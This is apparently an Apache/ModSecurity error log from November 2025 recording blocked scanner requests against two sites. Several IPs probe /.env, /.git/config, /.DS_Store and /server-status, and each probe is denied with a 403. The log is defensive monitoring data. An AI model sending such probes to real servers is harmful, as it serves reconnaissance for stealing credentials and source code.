[Sun Nov 02 06:00:22.331111 2025] [:error] [pid 3947654] [client 207.154.197.113:43554] [client 207.154.197.113] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aQblZkvMrycXA9lpGdej3AAAAAo"]
[Sun Nov 02 06:00:22.331330 2025] [:error] [pid 3947654] [client 207.154.197.113:43554] [client 207.154.197.113] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aQblZkvMrycXA9lpGdej3AAAAAo"]
[Sun Nov 02 06:00:22.331499 2025] [:error] [pid 3947654] [client 207.154.197.113:43554] [client 207.154.197.113] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aQblZkvMrycXA9lpGdej3AAAAAo"]
[Mon Nov 03 00:13:08.946431 2025] [:error] [pid 3966361] [client 204.76.203.25:37208] [client 204.76.203.25] ModSecurity: Warning. Matched phrase "/.gitignore" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.gitignore found within REQUEST_FILENAME: /.gitignore"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.gitignore"] [unique_id "aQflhJW8Vjm088_XBbOigAAAAAU"]
[Mon Nov 03 00:13:08.946706 2025] [:error] [pid 3966361] [client 204.76.203.25:37208] [client 204.76.203.25] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.gitignore"] [unique_id "aQflhJW8Vjm088_XBbOigAAAAAU"]
[Mon Nov 03 00:13:08.946885 2025] [:error] [pid 3966361] [client 204.76.203.25:37208] [client 204.76.203.25] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.gitignore"] [unique_id "aQflhJW8Vjm088_XBbOigAAAAAU"]
[Mon Nov 03 06:12:29.645031 2025] [authz_core:error] [pid 3972657] [client 167.71.81.114:44184] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/server-status
[Mon Nov 03 06:12:30.654026 2025] [:error] [pid 3972654] [client 167.71.81.114:44224] [client 167.71.81.114] ModSecurity: Warning. Matched phrase "/.DS_Store" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.DS_Store found within REQUEST_FILENAME: /.ds_store"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aQg5vrAAPQGI4EsmNagivgAAAAk"]
[Mon Nov 03 06:12:30.654275 2025] [:error] [pid 3972654] [client 167.71.81.114:44224] [client 167.71.81.114] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aQg5vrAAPQGI4EsmNagivgAAAAk"]
[Mon Nov 03 06:12:30.654464 2025] [:error] [pid 3972654] [client 167.71.81.114:44224] [client 167.71.81.114] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aQg5vrAAPQGI4EsmNagivgAAAAk"]
[Mon Nov 03 06:12:30.942384 2025] [:error] [pid 3972635] [client 167.71.81.114:44230] [client 167.71.81.114] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aQg5vvdR4zwHQUwyR0h_bgAAAAc"]
[Mon Nov 03 06:12:30.942627 2025] [:error] [pid 3972635] [client 167.71.81.114:44230] [client 167.71.81.114] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aQg5vvdR4zwHQUwyR0h_bgAAAAc"]
[Mon Nov 03 06:12:30.942813 2025] [:error] [pid 3972635] [client 167.71.81.114:44230] [client 167.71.81.114] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aQg5vvdR4zwHQUwyR0h_bgAAAAc"]
[Mon Nov 03 06:12:31.230059 2025] [:error] [pid 3972686] [client 167.71.81.114:44236] [client 167.71.81.114] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aQg5v7E6d5Hi4oTJ8EKGkQAAABI"]
[Mon Nov 03 06:12:31.230277 2025] [:error] [pid 3972686] [client 167.71.81.114:44236] [client 167.71.81.114] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aQg5v7E6d5Hi4oTJ8EKGkQAAABI"]
[Mon Nov 03 06:12:31.230454 2025] [:error] [pid 3972686] [client 167.71.81.114:44236] [client 167.71.81.114] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aQg5v7E6d5Hi4oTJ8EKGkQAAABI"]
[Mon Nov 03 16:07:08.767123 2025] [authz_core:error] [pid 3984051] [client 138.197.191.87:53862] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/server-status
[Mon Nov 03 16:07:09.891265 2025] [:error] [pid 3978545] [client 138.197.191.87:53894] [client 138.197.191.87] ModSecurity: Warning. Matched phrase "/.DS_Store" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.DS_Store found within REQUEST_FILENAME: /.ds_store"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.DS_Store"] [unique_id "aQjFHfaisFwXfoYwvTAXuQAAAAs"]
[Mon Nov 03 16:07:09.891474 2025] [:error] [pid 3978545] [client 138.197.191.87:53894] [client 138.197.191.87] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.DS_Store"] [unique_id "aQjFHfaisFwXfoYwvTAXuQAAAAs"]
[Mon Nov 03 16:07:09.891639 2025] [:error] [pid 3978545] [client 138.197.191.87:53894] [client 138.197.191.87] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.DS_Store"] [unique_id "aQjFHfaisFwXfoYwvTAXuQAAAAs"]
[Mon Nov 03 16:07:09.892493 2025] [authz_core:error] [pid 3984053] [client 164.92.244.132:50578] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/server-status
[Mon Nov 03 16:07:09.959704 2025] [:error] [pid 3978545] [client 138.197.191.87:53900] [client 138.197.191.87] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aQjFHfaisFwXfoYwvTAXugAAAAs"]
[Mon Nov 03 16:07:09.959915 2025] [:error] [pid 3978545] [client 138.197.191.87:53900] [client 138.197.191.87] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aQjFHfaisFwXfoYwvTAXugAAAAs"]
[Mon Nov 03 16:07:09.960071 2025] [:error] [pid 3978545] [client 138.197.191.87:53900] [client 138.197.191.87] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aQjFHfaisFwXfoYwvTAXugAAAAs"]
[Mon Nov 03 16:07:10.073600 2025] [:error] [pid 3972662] [client 138.197.191.87:53902] [client 138.197.191.87] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aQjFHlLYDyvB09YjlJ7eJAAAAA4"]
[Mon Nov 03 16:07:10.073805 2025] [:error] [pid 3972662] [client 138.197.191.87:53902] [client 138.197.191.87] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aQjFHlLYDyvB09YjlJ7eJAAAAA4"]
[Mon Nov 03 16:07:10.073963 2025] [:error] [pid 3972662] [client 138.197.191.87:53902] [client 138.197.191.87] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aQjFHlLYDyvB09YjlJ7eJAAAAA4"]
[Mon Nov 03 16:07:10.426293 2025] [:error] [pid 3981268] [client 164.92.244.132:50612] [client 164.92.244.132] ModSecurity: Warning. Matched phrase "/.DS_Store" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.DS_Store found within REQUEST_FILENAME: /.ds_store"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.DS_Store"] [unique_id "aQjFHoMg19n3SjfgmE4mWQAAAAM"]
[Mon Nov 03 16:07:10.426518 2025] [:error] [pid 3981268] [client 164.92.244.132:50612] [client 164.92.244.132] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.DS_Store"] [unique_id "aQjFHoMg19n3SjfgmE4mWQAAAAM"]
[Mon Nov 03 16:07:10.426741 2025] [:error] [pid 3981268] [client 164.92.244.132:50612] [client 164.92.244.132] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.DS_Store"] [unique_id "aQjFHoMg19n3SjfgmE4mWQAAAAM"]
[Mon Nov 03 16:07:10.747340 2025] [:error] [pid 3977957] [client 164.92.244.132:50614] [client 164.92.244.132] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aQjFHpAtTqGq-tGLd5buCwAAAAA"]
[Mon Nov 03 16:07:10.747563 2025] [:error] [pid 3977957] [client 164.92.244.132:50614] [client 164.92.244.132] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aQjFHpAtTqGq-tGLd5buCwAAAAA"]
[Mon Nov 03 16:07:10.747730 2025] [:error] [pid 3977957] [client 164.92.244.132:50614] [client 164.92.244.132] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aQjFHpAtTqGq-tGLd5buCwAAAAA"]
[Mon Nov 03 16:07:10.822095 2025] [:error] [pid 3981268] [client 164.92.244.132:50624] [client 164.92.244.132] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aQjFHoMg19n3SjfgmE4mWwAAAAM"]
[Mon Nov 03 16:07:10.822328 2025] [:error] [pid 3981268] [client 164.92.244.132:50624] [client 164.92.244.132] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aQjFHoMg19n3SjfgmE4mWwAAAAM"]
[Mon Nov 03 16:07:10.822539 2025] [:error] [pid 3981268] [client 164.92.244.132:50624] [client 164.92.244.132] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aQjFHoMg19n3SjfgmE4mWwAAAAM"]
[Tue Nov 04 10:03:43.753597 2025] [:error] [pid 3995821] [client 185.177.72.11:44420] [client 185.177.72.11] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aQnBb6ALxrX_6IyJOAmSiwAAAAs"]
[Tue Nov 04 10:03:43.753882 2025] [:error] [pid 3995821] [client 185.177.72.11:44420] [client 185.177.72.11] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aQnBb6ALxrX_6IyJOAmSiwAAAAs"]
[Tue Nov 04 10:03:43.754047 2025] [:error] [pid 3995821] [client 185.177.72.11:44420] [client 185.177.72.11] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aQnBb6ALxrX_6IyJOAmSiwAAAAs"]
[Tue Nov 04 19:36:38.310729 2025] [authz_core:error] [pid 4012593] [client 165.227.84.14:33790] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/server-status
[Tue Nov 04 19:36:39.288650 2025] [:error] [pid 4012590] [client 165.227.84.14:33822] [client 165.227.84.14] ModSecurity: Warning. Matched phrase "/.DS_Store" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.DS_Store found within REQUEST_FILENAME: /.ds_store"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aQpHtx3Q6z0hGeeuCtkkWgAAAAc"]
[Tue Nov 04 19:36:39.288897 2025] [:error] [pid 4012590] [client 165.227.84.14:33822] [client 165.227.84.14] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aQpHtx3Q6z0hGeeuCtkkWgAAAAc"]
[Tue Nov 04 19:36:39.289070 2025] [:error] [pid 4012590] [client 165.227.84.14:33822] [client 165.227.84.14] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aQpHtx3Q6z0hGeeuCtkkWgAAAAc"]
